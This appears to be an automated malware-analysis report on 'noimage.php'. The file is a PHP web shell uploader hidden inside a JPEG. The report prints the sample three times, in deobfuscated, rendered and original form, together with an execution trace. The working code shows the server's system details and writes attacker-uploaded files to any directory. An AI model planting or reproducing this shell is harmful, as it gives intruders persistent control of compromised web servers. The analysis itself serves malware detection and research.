PHP Malware Analysis
noimage.php
md5: 8a89912e04d09ead7ec278a5cfcea9ed
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- php_uname (Deobfuscated, HTML, Original)
Files
- move_uploaded_file (Deobfuscated, HTML, Original)
Input
- _FILES (Deobfuscated, HTML, Original)
- _POST (Deobfuscated, HTML, Original)
Title
- Uploader By Mr.Combet (Deobfuscated, HTML, Original)
Deobfuscated PHP code
����JFIF��H�H����O<!DOCTYPE html>
<html>
<title>Uploader By Mr.Combet</title>
<body style="margin-left:auto;margin-right:auto;width: 99%;background-color: black;color:black;text-align: center;">
<div style="color:yellow;">
<?php
echo "<h3 style='border: 2px solid #00bfff;border-radius: 5px;margin-bottom:5px;color: yellow;padding: 5px;'>" . php_uname() . "</h3>";
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="text" style="padding:5px;border: 2px solid #00bfff;border-radius: 5px;width:303px;margin-bottom:4px;background-color: transparent;color: yellow;" name="dir" placeholder="directory">
<input type="file" style="padding:2px;border: 2px solid #00bfff;border-radius: 5px;color:yellow;margin-bottom:4px" name="file" >
<input type="submit" style="padding:5px;border: 2px solid #00bfff;border-radius: 5px;background-color: transparent;color: yellow;margin-bottom:4px;padding-left: 10px;padding-right: 10px;" value="Submit" name="submit">
</form>
<?php
if (isset($_POST['submit'])) {
$target_dir = $_POST['dir'];
$target_file = $target_dir . basename($_FILES["file"]["name"]);
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
echo "Upload <a href='{$target_file}' style='color: yellow;text-decoration: none;'>Successful !!</a>";
} else {
echo "Upload Failed !!";
}
}
?>
</div>
</body>
</html>
���C�
% #
, #&')*) -0-(0%()(���C
(((((((((((((((((((((((((((((((((((((((((((((((((((���������������������������������������������
����P������������������������A�!)10������""������"*��@��������#+�OK&������2�Ec�xo����"�P��B}����������
�����������:9:9=<G$���
S,�"5�R2�i��ғ��3ʥ�3@�;":%885I@��e�
E��"�H�Z���ς�Z9 .
��������[+�
�M�������������������,��������0" !1234#$5@P`�������?�$|�
,.,���1�:�Q��<(���Q� Xi�
*3���|T��}h�� L,I�V��|�ho Z��9��ȅ*�+�%
��Y_�|5fcq�A�<���"8#_i���x���|�pۨ��p�+a�Q�uoŝȡ`sޚ5�n���.�:v��]�Mk��E�Gh�Ѐ"��B���i�f�<��O:��J�ԍ]o�҈g��Zz�!Xg{<6R�{�x'��`M����?�[Z�ط#5y�t�L�7S�) �vX���^�݈���;=�@^���Ƽ���
��
h��5� ���\��������������������������?4������������������������?4�����4� �������!1"02AQqa 3B��#@P`r��������?��f`��Y�ʉ�j����Zkx��@N� JaS������}��
��r��t��SɁ�3�p� e��W*͎�z4v
\�c����`zdg�dGu3�� ��=�2p*
��#��l�9�<���A���Pu
��k�������8�
�
�4k*;���������8���2�b��VӋE�t�[0�kmli�㵑39�i� ���2��o}
mM����kF
\�:2�+
w{{���-��$xVRkEA�N�
]�^�R�[
ryeV�G*G4��m�mӃ�N�!��hF�v��I� R��D�_�Q�p��T[l��D�.nN
Ӣ����O��˚�i7+�=�=8qJ���'����K�B{���K�͟e�5���:����e��1��w�m��[MA���č��Vj��mȵ�z)��
č��}��n�(���9� �?���)��������!1AQ0aq��� ��@�P`����?!��@v�,c�֟$M��6_���⠾SD $��!�/Y��:�NQ���!�c(��^��b�y��u��+�.H�U$�%嗗��ry�N>��]����X0�2D�q�q}Z��˥4ao����M,E�؇Uq� �Ϙc�AC\��:�+R��-�/9�Z
�O�A*��|��+,u�~�#G
�B" ���D�X1��_�VwP��� OY��"�d��+V�a�\�t�v�^��[��j�c
3�^�f4 KTFS��cNI��F���x
1F9
�m��@��YڭQ�+(��D��Dߵ[���$�M���&��D�Z�V��&ձGi�@�t}�к�/+�4����wd0Dh����
��aa
�M='�g�UK�M��7�M+�O}��
��4�r�ԋ�t��g\F,0���k��aX���U� ��5y��6�@�2��
��DmZ�V{�9]A�.m�EKZ��2 ���?���
������I$�I$�I$�I$�I$�I$�I$�I$A$�I$�@$I$�I I$�I ��$�I$�I$I$�II$�I$� �I$�I$�I$�I�A$�I$� �I$��$�I @�I$�$�I$�I �@$�I$�I$�I$�I$�I$�����������������������?4������������������������?4�����+��������!1AQ�aq�0����� ��@P`����?�����(Ir��ʲo��(� �#)�0�a �
?&�4�0�~��4Տ���K�Fhg~�����թ̛]NH
����}��N��:��5{y���o�BNb���s������C��t��kM�)j*D��$<�������gN� ��C��s%A#�*��=�@`䠴�?T+�U}�b��ʩ� D+�ϪG����!������j_�*)C�_ЂG�%�ү�4�X��T���IH������0r�"�%\~�%aJ��3�����iԁ �_�!�G�d
;�O�=$
VXx��
����B�KSZtk�&�#��)�p0�P ��Q.��M�9!�ۋne)��ҧ����4'��4$��)�F�^�v��� ��1j�f�z�U�K0�m�V=AA&C����"��gzu%�`08[^���Us���7��нWź
U��� �z����4)B��e-�HV%Hh7�ԑ��A(�>hP��\�%a�[lL�_n{Ґ���V4n�FX�D+��1Kt�Z��\��!2��)Y��9�Em8�,��_WeD3¢���a��zW��L�3���d^-�����A��}�Y�g�(A�бx�P>ƌH��ߤ;Vn�q������JH�
?�� A�0�
H��E��
�����jV�U��&H�����
��I�b&3�MF@H��L�E�
CV-k6
�T:W���&3y��-օ�cB�6�#�h�VL{Q�0
���Y��Execution traces
data/traces/8a89912e04d09ead7ec278a5cfcea9ed_trace-1676251212.6712.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:20:38.569078]
1 0 1 0.000222 393528
1 3 0 0.000306 401248 {main} 1 /var/www/html/uploads/noimage.php 0 0
1 3 1 0.000343 401360
0.000377 314240
TRACE END [2023-02-12 23:20:38.569280]
Generated HTML code
<html><head></head><body style="margin-left:auto;margin-right:auto;width: 99%;background-color: black;color:black;text-align: center;">����JFIFHH��O
<title>Uploader By Mr.Combet</title>
<div style="color:yellow;">
<!--?
echo "<h3 style='border: 2px solid #00bfff;border-radius: 5px;margin-bottom:5px;color: yellow;padding: 5px;'-->".php_uname()."";
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="text" style="padding:5px;border: 2px solid #00bfff;border-radius: 5px;width:303px;margin-bottom:4px;background-color: transparent;color: yellow;" name="dir" placeholder="directory">
<input type="file" style="padding:2px;border: 2px solid #00bfff;border-radius: 5px;color:yellow;margin-bottom:4px" name="file">
<input type="submit" style="padding:5px;border: 2px solid #00bfff;border-radius: 5px;background-color: transparent;color: yellow;margin-bottom:4px;padding-left: 10px;padding-right: 10px;" value="Submit" name="submit">
</form>
<!--?
if(isset($_POST['submit'])) {
$target_dir = $_POST['dir'];
$target_file = $target_dir . basename($_FILES["file"]["name"]);
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
echo "Upload <a href='$target_file' style='color: yellow;text-decoration: none;'-->Successful !!";
} else {
echo "Upload Failed !!";
}
}
?>
</div>
��C
% #
, #&')*) -0-(0%()(��C
(((((((((((((((((((((((((((((((((((((((((((((((((((����������
�P�A�!)10��""��"*��@����#+�OK&��2�Ec�xo�"�P��B}������
��:9:9=<G$��
S,�"5�R2�i��ғ3ʥ�3@�;":%885I@e�
E��"�H�Zς�Z9 .
�����[+�
�M���,0" !1234#$5@P`����?$|�
,.,���1�:�Q�<(���Q� Xi�
*3���|T��}h�� L,I�V��|�ho Z��9��ȅ*�+�%
��Y_�|5fcq�A�<���"8#_i�x���|�pۨ��p�+a�Q�uoŝȡ`sޚ5�n����.�:v��]�Mk��E�Gh��Ѐ"��B���i�f�<��O:��J�ԍ]o�҈g��Zz�!Xg{<6R�{�x'��`M������?�[Z��ط#5y�t�L�7S�) �vX���^�݈���;=�@^���Ƽ���
��
h��5� ���\��������?4������?4���4 !1"02AQqa 3B��#@P`r�������?���f`��Y�ʉ�j����Zkx��@N� JaS������}��
��r��t��SɁ�3�p� e��W*͎�z4v
\�c����`zdg�dGu3�� ��=�2p*
��#����l�9�<���A���Pu
��k�������8�
�
�4k*;���������8���2�b��VӋE�t�[0�kmli�㵑39�i� ���2��o}
mM����kF
\�:2�+
w{{���-��$xVRkEA�N�
]�^�R�[
ryeV�G*G4��m�mӃ�N�!��hF�v��I� R��D�_�Q�p��T[l��D�.nN
Ӣ����O��˚�i7+�=�=8qJ���'����K�B{���K�͟e�5���:����e��1��w�m��[MA����č��Vj��mȵ�z)��
č��}��n�(���9� �?��)!1AQ0aq��� ��@�P`���?!�@v�,c�֟$M��6_���⠾SD $��!�/Y��:�NQ���!�c(��^��b�y��u��+�.H�U$�%嗗��ry�N>��]����X0�2D�q�q}Z��˥4ao����M,E�؇Uq� �Ϙc�AC\�:�+R��-�/9�Z
�O�A*��|��+,u�~�#G
�B" ���D�X1��_�VwP��� OY��"�d��+V�a�\�t�v�^��[��j�c
3�^�f4 KTFS���cNI��F���x
1F9
�m��@��YڭQ�+(��D��Dߵ[���$�M���&��D�Z�V��&ձGi�@�t}�к�/+�4����wd0Dh����
��aa
�M='�g�UK��M��7�M+�O}��
��4�r�ԋ�t��g\F,0���k��aX���U� ��5y����6�@�2��
��DmZ�V{�9]A�.m�EKZ��2 ���?��
�I$�I$�I$�I$�I$�I$�I$�I$A$�I$�@$I$�I I$�I �$�I$�I$I$�II$�I$� �I$�I$�I$�IA$�I$ �I$��$�I @�I$�$�I$�I �@$�I$�I$�I$�I$�I$������?4������?4���+!1AQ�aq�0����� ��@P`��?����(Ir��ʲo��(� �#)�0�a �
?&�4�0�~��4Տ���K�Fhg~����թ̛]NH
����}��N����:��5{y���o�BNb���s������C��t��kM��)j*D��$<�������gN� ��C��s%A#�*�=�@`䠴�?T+�U}�b��ʩ� D+�ϪG����!������j_�*)C�_ЂG�%�ү�4�X��T��IH������0r�"%\~�%aJ��3�����iԁ �_�!�G�d
;�O�=$
VXx��
������B�KSZtk�&�#��)�p0�P ���Q.��M�9!�ۋne)��ҧ����4'��4$��)�F�^�v��� ��1j�f�z�U�K0�m�V=AA&C����"��gzu%�`08[^���Us���7��нWź
U�� �z����4)B��e-�HV%Hh7�ԑ��A(�>hP��\�%a�[lL�_n{Ґ���V4n�FX�D+��1Kt�Z��\��!2��)Y��9�Em8�,��_WeD3¢��a��zW��L�3���d^-�����A��}�Y�g�(A�бx�P>ƌH��ߤ;Vn�q������JH�
?�� A�0�
H�E��
�����jV�U��&H�����
��I�b&3�MF@H��L�E�
CV-k6
�T:W���&3y��-օ�cB�6�#�h�VL{Q�0
��Y��</body></html>Original PHP code
����JFIF��H�H����O<!DOCTYPE html>
<html>
<title>Uploader By Mr.Combet</title>
<body style="margin-left:auto;margin-right:auto;width: 99%;background-color: black;color:black;text-align: center;">
<div style="color:yellow;">
<?
echo "<h3 style='border: 2px solid #00bfff;border-radius: 5px;margin-bottom:5px;color: yellow;padding: 5px;'>".php_uname()."</h3>";
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="text" style="padding:5px;border: 2px solid #00bfff;border-radius: 5px;width:303px;margin-bottom:4px;background-color: transparent;color: yellow;" name="dir" placeholder="directory">
<input type="file" style="padding:2px;border: 2px solid #00bfff;border-radius: 5px;color:yellow;margin-bottom:4px" name="file" >
<input type="submit" style="padding:5px;border: 2px solid #00bfff;border-radius: 5px;background-color: transparent;color: yellow;margin-bottom:4px;padding-left: 10px;padding-right: 10px;" value="Submit" name="submit">
</form>
<?
if(isset($_POST['submit'])) {
$target_dir = $_POST['dir'];
$target_file = $target_dir . basename($_FILES["file"]["name"]);
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
echo "Upload <a href='$target_file' style='color: yellow;text-decoration: none;'>Successful !!</a>";
} else {
echo "Upload Failed !!";
}
}
?>
</div>
</body>
</html>
���C�
% #
, #&')*) -0-(0%()(���C
(((((((((((((((((((((((((((((((((((((((((((((((((((���������������������������������������������
����P������������������������A�!)10������""������"*��@��������#+�OK&������2�Ec�xo����"�P��B}����������
�����������:9:9=<G$���
S,�"5�R2�i��ғ��3ʥ�3@�;":%885I@��e�
E��"�H�Z���ς�Z9 .
��������[+�
�M�������������������,��������0" !1234#$5@P`�������?�$|�
,.,���1�:�Q��<(���Q� Xi�
*3���|T��}h�� L,I�V��|�ho Z��9��ȅ*�+�%
��Y_�|5fcq�A�<���"8#_i���x���|�pۨ��p�+a�Q�uoŝȡ`sޚ5�n���.�:v��]�Mk��E�Gh�Ѐ"��B���i�f�<��O:��J�ԍ]o�҈g��Zz�!Xg{<6R�{�x'��`M����?�[Z�ط#5y�t�L�7S�) �vX���^�݈���;=�@^���Ƽ���
��
h��5� ���\��������������������������?4������������������������?4�����4� �������!1"02AQqa 3B��#@P`r��������?��f`��Y�ʉ�j����Zkx��@N� JaS������}��
��r��t��SɁ�3�p� e��W*͎�z4v
\�c����`zdg�dGu3�� ��=�2p*
��#��l�9�<���A���Pu
��k�������8�
�
�4k*;���������8���2�b��VӋE�t�[0�kmli�㵑39�i� ���2��o}
mM����kF
\�:2�+
w{{���-��$xVRkEA�N�
]�^�R�[
ryeV�G*G4��m�mӃ�N�!��hF�v��I� R��D�_�Q�p��T[l��D�.nN
Ӣ����O��˚�i7+�=�=8qJ���'����K�B{���K�͟e�5���:����e��1��w�m��[MA���č��Vj��mȵ�z)��
č��}��n�(���9� �?���)��������!1AQ0aq��� ��@�P`����?!��@v�,c�֟$M��6_���⠾SD $��!�/Y��:�NQ���!�c(��^��b�y��u��+�.H�U$�%嗗��ry�N>��]����X0�2D�q�q}Z��˥4ao����M,E�؇Uq� �Ϙc�AC\��:�+R��-�/9�Z
�O�A*��|��+,u�~�#G
�B" ���D�X1��_�VwP��� OY��"�d��+V�a�\�t�v�^��[��j�c
3�^�f4 KTFS��cNI��F���x
1F9
�m��@��YڭQ�+(��D��Dߵ[���$�M���&��D�Z�V��&ձGi�@�t}�к�/+�4����wd0Dh����
��aa
�M='�g�UK�M��7�M+�O}��
��4�r�ԋ�t��g\F,0���k��aX���U� ��5y��6�@�2��
��DmZ�V{�9]A�.m�EKZ��2 ���?���
������I$�I$�I$�I$�I$�I$�I$�I$A$�I$�@$I$�I I$�I ��$�I$�I$I$�II$�I$� �I$�I$�I$�I�A$�I$� �I$��$�I @�I$�$�I$�I �@$�I$�I$�I$�I$�I$�����������������������?4������������������������?4�����+��������!1AQ�aq�0����� ��@P`����?�����(Ir��ʲo��(� �#)�0�a �
?&�4�0�~��4Տ���K�Fhg~�����թ̛]NH
����}��N��:��5{y���o�BNb���s������C��t��kM�)j*D��$<�������gN� ��C��s%A#�*��=�@`䠴�?T+�U}�b��ʩ� D+�ϪG����!������j_�*)C�_ЂG�%�ү�4�X��T���IH������0r�"�%\~�%aJ��3�����iԁ �_�!�G�d
;�O�=$
VXx��
����B�KSZtk�&�#��)�p0�P ��Q.��M�9!�ۋne)��ҧ����4'��4$��)�F�^�v��� ��1j�f�z�U�K0�m�V=AA&C����"��gzu%�`08[^���Us���7��нWź
U��� �z����4)B��e-�HV%Hh7�ԑ��A(�>hP��\�%a�[lL�_n{Ґ���V4n�FX�D+��1Kt�Z��\��!2��)Y��9�Em8�,��_WeD3¢���a��zW��L�3���d^-�����A��}�Y�g�(A�бx�P>ƌH��ߤ;Vn�q������JH�
?�� A�0�
H��E��
�����jV�U��&H�����
��I�b&3�MF@H��L�E�
CV-k6
�T:W���&3y��-օ�cB�6�#�h�VL{Q�0
���Y��